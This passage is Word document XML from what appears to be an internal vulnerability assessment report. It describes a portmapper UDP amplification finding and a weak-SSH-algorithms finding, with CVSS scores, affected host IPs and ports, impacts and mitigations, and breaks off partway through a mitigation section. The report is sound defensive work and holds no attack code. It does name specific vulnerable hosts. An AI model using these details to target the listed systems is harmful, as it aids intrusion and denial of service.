                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="3C7CE4F0" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49D1E548" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1455D945" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="4449BFEA" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E679FDC" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CVSS Vector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086C7824" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="7E130B45" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C544EBF" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Affected IP(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="295DCDF4" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9.114.12.79:111</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB2D7F2" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9.114.12.78:111</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="5207D429" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BA44449" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27DC85DA" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">An attacker can use a malformed UDP request to the port-mapper service and reflected large </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>size amplified response to be used to perform DOS on another service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="40ED2EAD" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11630C2D" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD6E7AD" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Disable or restrict Portmapper: If your system does not require Portmapper, it is recommended to disable it altogether. If Portmapper is necessary for certain services, restrict its access to trusted networks or specific IP addresses.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12829CB6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37C2A2D2" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Implement firewall rules: Configure your network firewall to block incoming traffic on UDP port 111 (the default Portmapper port) from external sources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66247B43" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194311">
        <w:bookmarkStart w:id="24" w:name="_Toc199711437"/>
        <w:bookmarkStart w:id="25" w:name="_Toc200562839"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>194311: Weak SSH Algorithms In Use</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="6DC066"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Low)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>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44D142C6" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2099A012" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="409E8724" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Weak SSH ciphers, Kex, and MAC algorithms are cryptographic algorithms used during the SSH communication process.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CB33730" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2258EE60" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Ciphers are responsible for encrypting the data sent between two devices. Weak ciphers can be easily broken, allowing attackers to intercept and read sensitive information.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48BDACB8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Key Exchange (Kex) algorithms are used to securely exchange encryption keys between devices. Weak Kex algorithms can lead to key compromise and may be exploited to launch Man-in-the-Middle (MitM) attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F97F280" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>MAC (Message Authentication Code) algorithms ensure data integrity by detecting any unauthorized modifications to the transmitted data. Weak MAC algorithms can be exploited to tamper with data and manipulate the communication process.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="733EE24D" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Identifying and addressing weak cryptographic algorithms is essential to maintaining a secure SSH environment.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7CA0F4" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E378995" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="00B90620" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B90620">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A5E3E8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://community.progress.com/s/article/SSH-Weak-Key-Exchanges-Ciphers-HMAC-Sunset-on-3-17-2019</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E251FC3" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://wiki.archlinux.org/title/OpenSSH#Security_best_practices</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11404593" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69B9C1B0" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Detected the following weak MACs: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16485A00" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">            hmac-sha1-etm@openssh.com            hmac-sha1                            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70B17C67" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63FE636B" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Detected the following weak </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>HostKey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> algorithms: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3138DE35" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">            rsa-sha2-512                         ecdsa-sha2-nistp256                  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DB16507" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">            rsa-sha2-256                                                         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="497DAC36" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75447865" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Please refer below screenshot:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ECBA04B" w14:textId="2DC6074E" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="216DF172" wp14:editId="422FAD53">
                  <wp:extent cx="4516341" cy="3729162"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="7" name="Drawing 7" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 7" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId36"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4565677" cy="3769899"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="12EF5EAA" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AFB847E" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E169218" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="0816617E" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040F5F3A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CVSS Vector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CC4E1C6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="001701D3" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DA6DC37" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Affected IP(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="655B01B8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9.114.12.79:22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5DE494" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9.114.12.78:22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="3545DA6A" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DAD991A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57D73CAF" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>The use of weak SSH ciphers, Kex, and MAC algorithms can lead to several security risks, including:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="773FDC95" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Confidentiality and Integrity Breach: Attackers can intercept and read sensitive data transmitted through the weak SSH connection, leading to a breach of confidentiality. They can also modify the data being transmitted, leading to a breach of integrity.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FE340A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Man-in-the-Middle (MitM) Attacks: Weak Kex algorithms can be exploited to launch MitM attacks, where attackers can intercept and modify the SSH communication, leading to data interception, modification, and theft.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1F63D6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Tampering Attacks: Weak MAC algorithms can be exploited to launch tampering attacks, where attackers can manipulate the transmitted data, leading to data tampering, modification, and theft.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="7B6DFDE1" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53D8EDE5" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="442B5EC8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
